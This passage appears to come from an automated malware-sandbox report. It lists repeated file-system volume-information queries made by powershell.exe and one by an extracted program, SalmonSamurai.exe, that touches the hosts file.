Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
